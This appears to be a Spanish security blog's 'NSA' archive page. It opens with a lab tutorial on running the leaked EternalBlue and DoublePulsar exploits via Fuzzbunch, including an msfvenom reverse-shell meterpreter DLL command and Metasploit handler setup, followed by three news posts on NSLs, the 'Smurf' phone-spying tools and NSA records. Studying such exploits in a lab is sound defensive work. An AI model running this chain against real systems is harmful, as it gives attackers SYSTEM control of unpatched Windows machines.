Categoría : NSA

Inicio/Archivo por Categoría NSA

How to: explotando Eternalblue + Doublepulsar

Hace pocos días saltaba la noticia de que se el grupo Shadow Brokers había liberado una nueva hornada de exploits de la NSA. Por si esto fuera poco, en el github donde están los exploits también hay información sobre como atacar a los sistemas bancarios.

La gran mayoría de los exploits publicados hacen que comprometer un sistema Windows sea cosa de niños y casi como vemos en las películas, puesto que ente ellos se encuentran varios 0-day (ahora ya parcheados por Microsoft) que atacan al protocolo SMB en todas sus versiones.

De todos los exploits disponibles, el que más ha llamado la atención a la comunidad ha sido el combo del llamado Eternalblue + Doublepulsar. En este post vamos a explicar cómo desplegar un entorno de pruebas donde poder probar los exploits.

(Aclaración: Sobra decir que la información se proporciona a título informativo y didáctico, con objeto de colaborar a mejorar el conocimiento de los técnicos en ciberseguridad. Los cibercriminales no necesitan que nadie les enseñe cómo utilizar los exploits.).

Necesitaremos:

  1. Máquina Virtual Windows atacante.
  2. Maquina Vitrual Windows víctima.
  3. Equipo con Linux.

Una vez desplegadas las máquinas virtuales de Windows, el primer paso es preparar una de ellas como la atacante. En esta debemos satisfacer una serie de requisitos para poder utilizar el framework Fuzzbunch, que es desde donde lanzaremos los exploits. Para ello se debe descargar el repositorio del git donde se han publicado los exploits y herramientas.

Se puede hacer con un “git clone” o descargando el repositorio directamente:

Una vez clonado el repositorio en nuestro equipo, habrá que acceder al directorio Windows que está dentro de EQGRP_Lost_in_Translation y crear la carpeta listeningposts. Si no hacemos esto, al intentar ejecutar Fuzzbunch nos saltará un error avisando de que no encuentra el directorio.

Para poder ejecutar el framework correctamente y sin ningún error se necesita de una versión antigua de Python y de Pywin32:

  1. Python 2.6.6 de 32bits (se ha probado con Python 2.7 y no funciona).
  2. PyWin32-221 para Python 2.6.6.
  3. Jre-6u15-windows-i-586.

Una vez esté todo instalado vamos a pasar a la acción. Aquí utilizaremos powershell pero también se puede hacer mediante cmd.

Uso del Framework Fuzzbunch

Desde el directorio EQGRP_Lost_in_Translation/windows ejecutamos Python fb.py para acceder al framework, e introducimos los siguientes parámetros:

  • Default Default target IP Addres [] : IP de la víctima.
  • Dafault Callback Addres [] : IP de nuestra máquina Windows.
  • Use redirection[yes] : Establecer a ‘no’.
  • Base Log directory [D:\logs] : Establecer la ruta para almacenar los logs.

Acto seguido hay que crear un proyecto. Una vez realizados estos pasos, veremos en el prompt fb>

Ilustración 1 Terminal del framework

Para visualizar qué exploits hay disponibles podemos teclear Show Exploits:

Ilustración 2 Exploits disponibles

Como se ha comentado anteriormente, en este post se va a explicar Eternalblue (auque no salga en la lista, está disponible) junto con Doublepulsar. Muy por encima, Eternalblue se encarga de crear un backdoor y Doublepulsar inyecta una dll en el proceso del sistema que queramos.

Eternalblue

Para hacer uso de Eternalblue hay que teclear use Eternalblue y acto seguido introducir la información solicitada por pantalla:

Ilustración 3 Configurando Eternalblue

Si todo ha salido bien veremos el siguiente mensaje en el terminal:

Ilustración 4 Ejecución terminada con éxito

Doublepulsar

Con la backdor creada con Eternalblue, el próximo paso a realizar es inyectar una dll en un proceso del sistema comprometido haciendo uso de Doublepulsar.

Para generar la dll podemos hacer uso de msfvenom:

msfvenom -a x64 -p windows/meterpreter/reverse_tcp lhost=IP lport=PUERTO -f dll -o raccoon64V2.dll

Y desde metasploit dejar un handler esperando a recibir una conexión desde la máquina comprometida:

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

[..]

Volviendo a Doublepulsar, como en el proceso anterior hay que introducir la información que va apareciendo en el terminal:

Ilustración 5 Configuración Doublepulsar

Si lo hemos hecho todo bien, tendremos en nuestro equipo local un meterpreter con privilegios SYSTEM sobre la máquina virtual víctima. Con unos sencillos pasos y un par de clicks hemos llegado a comprometer un equipo conociendo solo su dirección IP.

Ilustración 6 Sesión de meterpreter

Por último y no menos importante, una vez tengamos la conexión con el meterpreter deberemos volver a ejecutar Doublepulsar y seleccionar la opción:

4) Uninstall           Remove's backdoor from system

Para eliminar la backdoor, puesto que ya no la necesitamos.

Ilustración 7 Eliminación de la backdoor

Como se ha podido observar, resulta alarmante la facilidad con la que se consigue comprometer un sistema Windows haciendo uso de estos exploits.

En estos momentos creo que todo el mundo se estará preguntando: ¿si esto es lo que se ha publicado, que más cosas tendrán los chicos buenos de la NSA?

 

Visto en: SecurityatWork

Detalles de Carta de Seguridad Nacional del FBI

Mientras  los documentos de Snowden han desmitificado las habilidades de la comunidad hackers de inteligencia, pocos detalles se conocen sobre las Cartas de Seguridad Nacional, el más poderoso instrumento de aplicación de la ley para obligar a las telecomunicaciones y los proveedores de servicios de Internet a entregar un amplio alcance de los datos de los usuario, y que lleva consigo una orden mordaza.

Ayer, todo eso cambió cuando Nicholas Merrill, propietario de la ahora extinta ISP Cáliz, estaba legalmente autorizado a revelar públicamente un archivo adjunto de NSL que recibió en 2004 buscando información sobre uno de sus clientes.

En agosto, el Juez de Distrito de Estados Unidos Victor Marrero falló a favor de Merrill, debido a que el FBI no había demostrado que la divulgación de los datos adjuntos NSA sería un  “riesgo de un daño considerado”. Merrill dio al gobierno tres meses para apelar antes de revelarlo.

“El FBI ha interpretado su autoridad NSL para contener los sitios web que leemos, las búsquedas en la web que realizamos, las personas que contactamos, y los lugares a los que vamos. Este tipo de datos revela los detalles más íntimos de nuestras vidas, incluyendo nuestras actividades políticas, afiliaciones religiosas, las relaciones privadas, e incluso nuestros pensamientos privados y creencias “, dijo Merrill en un comunicado difundido por sus abogados en la Escuela de Derecho de Yale.

El archivo adjunto sin editar contiene una larga lista de información que el FBI considera que bajo el “paraguas” de un término jurídico indeterminado “Registro de comunicación electrónica transaccional” En el caso específico de Merrill, el FBI no sólo solicitó información detallada personal, sino también el historial del navegador, dirección  IP del conectado , direcciones de correo electrónico, nombres de usuario y alias en línea asociadas a la cuenta, además de seis meses del valor de las compras en línea. El FBI también buscó un registro radio, que incluye seguimiento de información  por torres base.

NSL que están escritas y ejecutadas sin orden judicial, en los casos que afectan a la seguridad nacional, se han debatido prominentemente desde que se iniciaron las revelaciones de Snowden en junio de 2013. Las empresas de tecnología han argumentado y presentado una demanda en algunos casos, que NSL violan la Primera y Cuarta Enmienda derechos. Empresas como Twitter, Google y otros gigantes dicen que el secreto de sumario NSL mantiene las empresas de tecnología de revelar el alcance de su cooperación con el gobierno y abre la puerta a la especulación de que la NSA, FBI y otras fuerzas del orden podrían tener acceso directo a los datos del cliente.

“El amplio alcance de la autoridad NSL reclamado por el FBI es profundamente problemático porque el gobierno puede emitir NSL sin ninguna supervisión judicial”, dijo Lulu Pantin, un pasante estudiante de derecho que representó a Merrill. “La experiencia de Merrill demuestra que el FBI silencia indefinidamente Proveedores de Servicios de Internet, mientras que los obliga a des-anonimizar sus usuarios y difundir una amplia gama de información acerca de la actividad en línea de ciudadanos respetuosos de la ley o simplemente mediante la emisión de una carta”.

El FBI comenzó a emitir NSL en 2001, poco después del 11 de septiembre los ataques terroristas en los EE.UU. en virtud de los poderes ampliados que ofrece la Ley Patriota. Con la aprobación de la Ley LIBERTAD EE.UU., los poderes que ofrece la aplicación de ley por una Ley de Seguridad Nacional se han refrenado, dijo Andrew Crocker, el abogado personal de la Electronic Frontier Foundation.

“Por un lado, se trata de un negocio muy grande. Este es el primer archivo adjunto NSL que ha sido desprecintado y el FBI emitió 300.000 desde 2001. Eso es un montón que se publicará sin siquiera mostrar simpatía “, dijo Crocker. “Tenemos la oportunidad de ver el alcance de lo que el FBI podría conseguir con una Ley de Seguridad Nacional desde el año 2004. Ha sido desde entonces que tiró  las riendas, y el alcance es un poco estrecho. Pero es algo muy importante ver la amplitud de lo que se pensaba que podían obtener en ese entonces”.

El siguiente paso, dijo Crocker, es continuar desafiando las NSL (que permanecen en uso por una suma de aproximadamente de 10.000 emisiones anualmente) con el argumento de que es una violación a la Primera Enmienda.

“Está claro el alcance que tenían era muy amplio”, dijo Crocker, que apunta a la naturaleza abierta de lo que se considera un registro de comunicaciones electrónicas transaccionales, que en el caso de Merrill se utilizó para obtener la ubicación física del  celular y seguir blancos a través de su celular.

Crocker cree que mientras el FBI siga utilizando NSL en las investigaciones, más desafíos saldrán a la superficie, a pesar del número relativamente pequeño desde 2001. La FEP, dijo que  tiene actualmente dos de estos desafíos en la corte.

“La razón más obvia del porque no hemos visto muchos desafíos es que cuando llegue una carta del FBI que dice; danos la información y no se lo digas a nadie, que es un poco intimidante y la gente no se atreve a enfrentarlos. Hay una intimidación inherente”, dijo Crocker. “Además, cuando van a un ISP con una NSL, es posible que no se preocupen por dar información sobre sus clientes; no es su información. Hemos visto una larga historia de cooperación con la vigilancia de la NSA. Algunos pueden pensar que es su deber patriótico a cooperar. Pero hemos visto que el cambio desde Snowden, los clientes se preocupan por la privacidad y las empresas están tomando diferentes posiciones sobre la privacidad, donde es posible que no hayan pensado mucho al respecto con anterioridad”.

“Es un poco decepcionante que ha tomado tanto tiempo para llegar a este punto”, dijo Crocker, quien agregó que los abogados han llegado a acuerdos en el pasado para conseguir otras partes de NSL sin sellar y sin editar. “Han emitido 300.000 NSL desde 2001 y no sólo han pasado un puñado de desafíos. Esto demuestra el desequilibrio de poderes de vigilancia y lo difícil que es estar a la altura”.

Fuente: Threat Post

Los Pitufos que usan tu celular sin que te des cuenta

El chistoso nombre que le han puesto a estas herramientas de espionaje no se corresponde con lo que son capaces de hacer.

Que las paredes tienen oídos es algo que sabemos porque lo dicen, bajito, en las películas de espías. Una frase caída en desuso. Lo que ahora tiene oídos (y ojos) es el celular que tienes en el bolsillo. Y no sólo eso: tiene pitufos que trabajan para el Gobierno.

Sí, pitufos, que controlan tu teléfono mejor que tú.

Esos duendecillos azules que creíamos que vivían en los cómics para niños, en el siglo XXI son capaces de encender tu teléfono, grabar tus conversaciones de sobremesa, sacarte una fotografía cuando piensas que eres tú quien retrataba algo o localizar el punto exacto donde te encuentras.

Son “trabajadores” de los servicios de inteligencia y no necesitan romper la puerta de tu casa para espiarte.

Eso es, al menos, lo que le explicó Edward Snowden al programa Panorama de la BBC desde Moscú, donde vive exiliado desde que reveló en 2013 que no hacía falta cometer crímenes para ser espiado, ya que el gobierno de EE.UU estaba vigilando masivamente a la ciudadanía a través de sus comunicaciones digitales.

Snowden reveló cómo los servicios secretos de EE.UU y de Reino Unido, por ejemplo, están invirtiendo una gran cantidad de dinero en tecnología para vigilar masivamente las comunicaciones privadas de los ciudadanos.

Y aquí entra en juego lo que estos servicios llaman chistosamente “suite Pitufo”.

Y cada uno tiene un papel:

  • Pitufo Soñador

El “espía” pitufo soñador es una herramienta de “hackeo” que permite encender y apagar el teléfono sin que el usuario lo sepa.

¿Con qué fin?

Que entren en escena el resto de pitufos.

  • Pitufo Fisgón

Uno de sus “pitufos” se encarga de que la presencia de espionaje no deje huellas en los aparatos.

Una vez que el teléfono está encendido, puede actuar por ejemplo este “pitufo”, un código que “activa el micrófono del aparato” para que puedan escuchar todo lo que esté sucediendo alrededor.

  • Pitufo Rastreador

Es una herramienta de geolocalización“que permite seguirte con una gran precisión”, apunta Snowden. Más que con la se obtiene “con la típica triangulación de las torres de telefonía celular”.

  • Pitufo Paranoico

Este pitufo es el que se encarga de cubrir a todos los demás, de tapar sus huellas.

Snowden cuenta que “es una herramienta de autoprotección” del sistema, que se utiliza “para blindar la manipulación de tu teléfono”.

Un simple mensaje SMS, que se quedará oculta, permite a los servicios de inteligencia colarse en los celulares, ypone un ejemplo: “Si quieres llevar a reparar el teléfono porque viste que algo extraño está pasando o porque sospecha que algo anda mal, esta herramienta hará mucho más difícil a cualquier técnico” saber qué es lo que ha estado sucediendo en ese celular.

Saber que ha estado siendo controlado por un increíble grupo de “pitufos”.

¿Cómo se introducirían en tu celular?

Para introducirse en tu celular, los servicios de inteligencia utilizan un mensaje sms que pasa desapercibido, relata Snowden.

Técnicamente, “se llama un exploit“, cuenta. “Es un mensaje especialmente diseñado que se envía como cualquier otro, pero cuando llega a tu teléfono se oculta”.

Así de fácil, un mensaje y ya el teléfono no es exclusivamente suyo. “Usted pagó por el teléfono pero el que controla el software” es que el posee realmente el aparato.

Y el poseedor si eso ocurre es Papá Pitufo. Es decir, el Gobierno.

Y “no hay mucho” con lo que puedas defenderte, zanja Snowden.

Edward Snowden entregó pruebas a la prensa de que los servicios de inteligencia de EE.UU estaban realizando un espionaje masivo e indiscriminado a los ciudadanos.

Edward Snowden entregó pruebas a la prensa de que los servicios de inteligencia de EE.UU estaban realizando un espionaje masivo e indiscriminado a los ciudadanos.

Fuente: BBC

EEUU. Juez ordena a la NSA no destruir registros de espionaje

El juez de distrito Jeffrey White emitió la orden para prevenir que la NSA destruya los registros telefónicos que almacena desde hace más de cinco años.

Un juez federal de San Francisco emitió una orden con alcance nacional para evitar que la Agencia Nacional de Seguridad de Estados Unidos (NSA por sus siglas en inglés) destruya registros de vigilancia telefónica.

El juez de distrito Jeffrey White emitió la orden el 10 de marzo para prevenir que la NSA destruya los registros telefónicos que almacena desde hace más de cinco años.

nsa02

El miércoles, White, quien se encarga de revisar una demanda por violación de la privacidad contra la agencia, prolongó esa orden porque los registros son necesarios para el veredicto que dará.

El periódico The San Francisco Chronicle (http://bit.ly/1j9mp67) informó que entre las 23 organizaciones demandantes hay iglesias, defensores del consumo de marihuana y propietarios de armas.

Cindy Cohn de la Fundación Frontera Electrónica dijo que los registros pueden ser destruidos si el gobierno confirma que se recopiló información de los demandantes pero James Gilligan, abogado del Departamento de Justicia dijo que esa información debe permanecer en secreto.

Fuente: El Universal

Continuar leyendo